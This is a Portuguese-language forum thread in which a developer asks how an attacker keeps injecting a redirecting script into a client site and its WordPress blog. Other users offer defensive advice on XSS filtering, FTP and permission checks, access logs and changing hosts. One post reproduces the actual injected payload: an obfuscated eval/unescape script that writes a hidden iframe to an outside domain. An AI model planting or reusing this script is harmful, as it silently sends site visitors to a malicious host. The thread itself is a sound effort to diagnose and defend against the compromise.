[Resolvido] invasao por java script injection como proteger disso

[kakaroto developer 0]

ola gente

 

uma semente do mal (hacker) fez um insert de um java script doido no rodape do seu do site do meu cliente

 

sendo que o result iframe no rodape do site

que redireciona para o site dele

 

 

eu removo o bicho mais o monstro inseriu novamente

 

sendo que o suporte tecnico do meu provedor so tem burro que nao ajudar em nada

 

 

ele so consegue colocar na index do site e na index do admin

 

sendo que o admin nao e disponivel para web e sua posicao e meia que oculta vamos disse assim

 

www.site.com/pagina/reserva/admin

 

minha suspeita que ele esta usando um scan pq ele inseriu agora a tarde no admin2 que era admin

 

eu me lembro de um code que bloqueava scan no server online um htacess para ser sincero

 

 

 

 

como e iframe eu coloquei um jquery

 

$(iframe).remove();

 

e nao apareceu mais

 

a minha duvida e como esse cara consegui inserir isso ?

 

e como eu posso me protege desse tipo de ataque ?

 

 

Desculpe gente eu nao posso colocar o nome do site aqui :(

 

 

a tecnica dele usada e java script injection

 

 

sendo que e politica da empresa nao atacar

 

pq se eu pego ele dentro do admin qualquer coisa que entra dentro do admin e um ip

 

eu teria como zoar ele

 

como politica de segurança usei um htacess agora para ninguem acessar mais o admin nesse horario da noite

 

mais e o site como eu resolvo isso

 

to sem ideia :(

[Beraldo 864]

uma semente do mal (hacker)

 

Diferença entre Hacker e Cracker

Isso foi feito por um cracker

 

 

 

sendo que o admin nao e disponivel para web e sua posicao e meia que oculta vamos disse assim

 

www.site.com/pagina/reserva/admin

 

Não é disponível para WEB? Você acabou de postar uma URL. Não entendi.

 

 

a minha duvida e como esse cara consegui inserir isso ?

 

e como eu posso me protege desse tipo de ataque ?

 

O código pode ter sido inserido por meio de um formulário que está permitindo inserção de HTML

Tem que analisar logs de acesso também. É possível que o cara tenha conseguido acessar o FTP, pode ter conseguido acesso root ao servidor (ou somente à sua conta)

[kakaroto developer 0]

ola meu velho

 

quando eu coloque hacker foi meio generico

 

acho impossivel ele te tido acesso ao ftp

 

 

sobre essa parte aqui

 

sendo que o admin nao e disponivel para web e sua posicao e meia que oculta vamos disse assim

www.site.com/pagina/reserva/admin

 

 

significar

 

www.sitedomeucliente.com/paginasecreta/maisoutrapaginaoculta/admin

 

ou seja somente um scan de pastas dentro do server seria possivel

 

eu pedi ao suporte tecnico um log o pessoal e muito burro disse que nao tem

 

 

agora como esse cara fez isso que me deixa doido

 

como você falou o code pode esta sendo pelo formulario que permite html

mais como ele fez isso e como me protege disso ?

 

essa e a questão

 

um abraço

[Beraldo 864]

acho impossivel ele te tido acesso ao ftp

 

por que acha isso?

 

 

www.sitedomeucliente.com/paginasecreta/maisoutrapaginaoculta/admin

 

ou seja somente um scan de pastas dentro do server seria possivel

 

O Google é o maior aliado para encontrar páginas "ocultas".

É por ele que se encontram com facilidades aqules famosos db_config.inc.

Estando no public_html, é muito difícil esconder uma página. Um robots.txt pode ajudar, mas não tenho certeza até onde ele é eficaz.

 

 

eu pedi ao suporte tecnico um log o pessoal e muito burro disse que nao tem

 

Sinceramente, mude para um, servidor decente, que pelo menos tenha logs de acesso a FTP

 

 

como você falou o code pode esta sendo pelo formulario que permite html

mais como ele fez isso e como me protege disso ?

 

a função strip_tags() retira todas as tags HTML.

Mas é possível criar uma função, usando preg_replace(), para retirar algumas tags e permitir outras.

[allisson 0]

É isso que o amigo falou, usa a função strip_tags() que irá resolver os problemas do cara te invadir ou fazer algum mal atraves de XSS[o que é XSS? ]provavelmente você sofreu um ataque desses. O correto seria você deixa o site em off alguns minutinhos e escapar tudo que entra no seu site ou seja tratar todos os dados que podem ser inseridos pelos usuários para que este tipo de coisa não aconteça.No mais procura como evitar XSS e SQL Injection. Que acho que seu problema irá ser sanado até mais!

 

Abraço. ^_^

[Evandro Oliveira 331]

 

como você falou o code pode esta sendo pelo formulario que permite html

mais como ele fez isso e como me protege disso ?

 

a função strip_tags() retira todas as tags HTML.

Mas é possível criar uma função, usando preg_replace(), para retirar algumas tags e permitir outras.

 

para este fim, passe as tags permitidas como segundo parâmetro de strip_tags

http://br2.php.net/manual/pt_BR/function.strip-tags.php

[kakaroto developer 0]

o que esse cara colocar e isso no meu site

 

<?php
// Silence is golden.
?><script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%68%4F%58%2C%73%6A%63%75%2C%73%70%2C%49%41%76%42%2C%53%56%50%45%2C%74%77%68%29%7B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%73%70%29%7B%72%65%74%75%72%6E%20%73%70%2E%74%6F%53%74%72%69%6E%67%28%73%6A%63%75%29%7D%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%73%70%2D%2D%29%74%77%68%5B%53%56%50%45%28%73%70%29%5D%3D%49%41%76%42%5B%73%70%5D%7C%7C%53%56%50%45%28%73%70%29%3B%49%41%76%42%3D%5B%66%75%6E%63%74%69%6F%6E%28%53%56%50%45%29%7B%72%65%74%75%72%6E%20%74%77%68%5B%53%56%50%45%5D%7D%5D%3B%53%56%50%45%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%73%70%3D%31%7D%3B%77%68%69%6C%65%28%73%70%2D%2D%29%69%66%28%49%41%76%42%5B%73%70%5D%29%68%4F%58%3D%68%4F%58%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%53%56%50%45%28%73%70%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%49%41%76%42%5B%73%70%5D%29%3B%72%65%74%75%72%6E%20%68%4F%58%7D%28%27%38%2E%30%28%22%3C%64%20%63%3D%5C%5C%22%62%3A%2F%2F%61%2E%39%2F%5C%5C%22%20%37%3D%31%20%36%3D%31%20%35%3D%5C%5C%22%34%3A%33%3B%32%3A%65%5C%5C%22%3E%22%29%3B%27%2C%31%35%2C%31%35%2C%27%77%72%69%74%65%7C%7C%70%6F%73%69%74%69%6F%6E%7C%68%69%64%64%65%6E%7C%76%69%73%69%62%69%6C%69%74%79%7C%73%74%79%6C%65%7C%68%65%69%67%68%74%7C%77%69%64%74%68%7C%64%6F%63%75%6D%65%6E%74%7C%63%6F%6D%7C%61%76%65%72%73%62%6F%6E%6B%6F%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%61%62%73%6F%6C%75%74%65%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->

 

agora de manha

ele colocou na index do blog

que usar wordpress

 

esse code maluco gerar um iframe que vai para o site

e o blog esta em wordpress

e ele so colocar em paginas index

 

ontem eu coloque um jquery que remove qualquer iframe

resultado final so na index do blog que eu nao coloquei e o cara jogou

 

o blog e wordpress

[kakaroto developer 0]

sobre a pergunta do ftp :(

para eu colocar qualquer no site

eu tenho que pegar os arquivos gravar em cd

 

e entrega para um cara da empresa

que faz o upload numa maquina linux que tem mais segurança do que qualquer coisa no mundo

 

e o cara que mexer nessa maquina ele passar o dia todo sentando na frente desse pc

e so ele tem essa conta e uma unica e desculpe a sinceridade o cara trabalhar linux a muito anos

 

sobre o wordpress ele esta todo atualizado ,e o tema e proprio da empresa

 

eu nao entendi como ele esta entrando e como me proteger disso

[Williams Duarte 431]

Rapaz procure ler sobre segurança, desta forma você não resolverá seu problema, os companheiros postaram as funçoes e você ainda bate na mesma tecla.

 

Antes de sair culpando e chamandos as pessoas de burras, certifique-se primeiro se o erro não é seu, como já vi em diversos tópicos parecidos, no final a culpa é do próprio sublinho onde usam programas crackeados e contaminam as proprias máquianas de acesso ao host e acham que são espertos por bular programas com crackes recheados.

[kakaroto developer 0]

Rapaz procure ler sobre segurança, desta forma você não resolverá seu problema, os companheiros postaram as funçoes e você ainda bate na mesma tecla.

 

Antes de sair culpando e chamandos as pessoas de burras, certifique-se primeiro se o erro não é seu, como já vi em diversos tópicos parecidos, no final a culpa é do próprio sublinho onde usam programas crackeados e contaminam as proprias máquianas de acesso ao host e acham que são espertos por bular programas com crackes recheados.

 

@WDuarte eu nao entendi a sua colocação

sobre os formularios eu nao respondi pq eu esqueci de comentar sobre o assunto

 

o site e para apresentacao

e o unico form que tem do lado de fora e um sistema de pergunta interno nosso

mysql escape string ( que para entrar no banco eu uso isso)

 

Desculpe a sinceridade eu nao entendi a parte de chamar alguem de burro ,eu nao tenho culpa ser o suporte tecnico do provedor nao ajudar em nada

e nao liberar log para mim.

 

 

Ser você meus post eu sou um camarada que ajudar legal,sendo que agora eu estou com um problema

e as sugestao postadas eo minimo que ser faz para uma segurança de site

 

eu avalie as possibilidades de como ele poderia ter feito

 

nada entra no banco aqui sem escape

 

Antigamente teve uma postagem sobre SQL injection uns 3 anos neguinho criou funcao com mais de 1000 linhas

 

eu pesquisei na web e vi com uma linha resolviar o problema

 

eu nao estou procurando um culpado e sim uma manera de protege o site

 

pq ele nao tem entrada por formulario

 

os formularios sempre levam escape antes de bate no banco

 

Get eu verifico se e um numero antes de abrir e ganhar escape tambem

 

 

 

mais tudo bem eu vou pesquisar na web como me proteger

 

um abraço a todos que postaram

[Williams Duarte 431]

Vi seus tópicos e vai uma força pa você!!!

 

Constrindo um site a prova de balas

 

t+++

[Beraldo 864]

sobre a pergunta do ftp :(

para eu colocar qualquer no site

eu tenho que pegar os arquivos gravar em cd

 

e entrega para um cara da empresa

que faz o upload numa maquina linux que tem mais segurança do que qualquer coisa no mundo

 

e o cara que mexer nessa maquina ele passar o dia todo sentando na frente desse pc

e so ele tem essa conta e uma unica e desculpe a sinceridade o cara trabalhar linux a muito anos

 

Pelo que entendi, essa máquina não é o servidor. É apenas um terminal que acessa o servidor via FTP

Isso não significa segurança

 

Acesso SSH é uma das coisas mais seguras que existem (mais que FTP comum, apesar de existir o SFTP, FTP com SSH).

 

Fica sentado na frente de um terminal o dia todo não quer dizer nada. O problema está no servidor remoto

 

 

E me parece contraditório o cara ser um *expert* em Linux, querer um sistema seguro de forma a nem liberar conta FTP e, mesmo assim, não ter um sistema de logs de aceesso

 

 

Verifique o dono dos arquivos, as permissões deles principalmente (vai precisar entender um pouco de Linux e chmod).

O invasor pode ter conseguido acessar uma outra conta qualquer no servidor, mas encontrou seu s arquivos com permissão de escrita. Se ele tiver acesso shell no servidor, pode fazer qualquer coisa com sues arquivos.

[kakaroto developer 0]

Ola bom dia @WDuarte

 

Obrigado pela sugestão ,por medida de segurança eu ja mudei de server,conforme o @Beraldo falou

mais com certeza eu to louco para descobrir como ele fez ,ate agora eu to dormindo em paz

mais estou revisando os scripts e otimizado tudo

 

to montando um log em php que vai me ajudar a ver os movimentos dos caras e entende a tecnica e me protege e claro

 

@Beraldo

 

Calma meu moderador você parece meio estressado ;)

mais mesmo assim obrigado pela sugestão como eu tinha postando anteriormente eu nao estou procurando um culpado

e sim uma soluçao e como eu postei la em cima com esse log eu vou aprende as tecnicas usadas por ele e me protege disso

 

e claro que segurança a prova isso e meio utopia mais tambem eu nao posso dar mole com esses carinhas,estamos verificando tudo e possivel erros

e as sugestão que você postou ,mais to com o meu orgulho ferido :( pela invasao ,pq nao sei quem errou no trabalho

 

 

Afinal Ainda sou o kakaroto :P

 

um abraço as todos que postaram

qualquer sugestão nova vai ajudar nao sou a mim , a outro que passarem pelo mesmo problema que eu :)

[Beraldo 864]

@Beraldo

 

Calma meu moderador você parece meio estressado ;)

 

Não.

Justamente o contrário. Sou bem tranquilo. :)

É que isso não fica muito transparente por meio de texto. ;)

 

 

E eu não citei culpados. Eu apenas achei contraditórias algumas coisas que você postou sobre o servidor. Às vezes essa sensação de segurança é falsa.

 

Eu também uso Linux há bastante tempo e sei que há coisas muito seguras e outras pouco seguras.

 

E todos sabem que, não importa o SO, nunca há 100% de segurança

[koga021 0]

Muda de hospedagem,

qualquer hospedagem que se prese tem um log de acesso.

nao adianta tambem ser um servidor linux, se as politicas de segurança sao ruins.

 

Faz mum teste.

pegue o ip do seu site e de um nmap nele e descubra que portas realmente estao abertas.

abraço

[kakaroto developer 0]

@Beraldo tranquilo meu velho :) eu to montando um script para gerar uns log interno

revisando o site ou seja me protegendo para ser sincero nunca passei por isso

 

 

 

@koga021 vou :) ver esse server novo com nmap ser esta ok

isso eu nao fiz

excelente sugestao meu velho

 

por enquanto eu estrou tranquilo ;)

mais tenho que preparar a minha defesa para o proximo ataque

[Beraldo 864]

eu to montando um script para gerar uns log interno

 

Esse log é de acesso ao seu site, certo?

O servidor deve possuir sistema de log de acesso HTTP e FTP.

Manualmente vocÊ vai conseguir gerar logs ligados ao seu site. Mas não conseguirá registro de acesso FTP, por exemplo, ou SSH, caso seu servidor permita esse tipo de acesso

[kakaroto developer 0]

@ola beraldo

 

http://forum.imasters.com.br/index.php?/topic/390431-codigo-criptogafado/page__gopid__1520781entry1520781

 

olha esse post beraldo e a mesma coisa do meu sendo que o site do cara la e em asp

 

isso coisa confirmar a minha suspeita e algo robotico

 

Minha ideia e usar por eliminação , ser for um cara logado no site eu tenho ele gravado no banco se ele fizer algum movimento estranho no server

 

ser usarem uma senha louca para logar no site eu tenho como gravar tudo e ver que tipo de acao esse povo ta fazendo

 

user injection via url ou sql e por ai vai

 

eu preciso entende como eles estao fazendo e assim tomar um pouco de aspirina

mais com certeza eu tenho log de acesso ao servidor

 

nao e que todo mundo falar um dia da caça e outro do caçador ^_^

[kakaroto developer 0]

Ola @beraldo ablas espanhol

 

 

eu disse que hj iar fazer a caça

 

olha essa postagem

 

http://powers.cl/viewtopic.php?f=4&p=3642330

 

tu vai reparar no final esse code la

<!-- uy7gdr5kmn -->

 

e uma variante do meu

 

olha essa postagem e veja a solução

 

http://www.solosequenosenada.com/2009/10/11/ayer-nos-metieron-un-virus-troyano-desconocido-llamado-kytten/

 

olha os comentarios

 

traduzindo nao foi o programador em php aqui que fez a bosta nao como tava rolando aqui

 

lembrar do cara que upar os sites para web

acho que vamos precisar de um novo responsavel para dar manutençao dos pc : :P

 

 

 

ainda so o kakaroto :P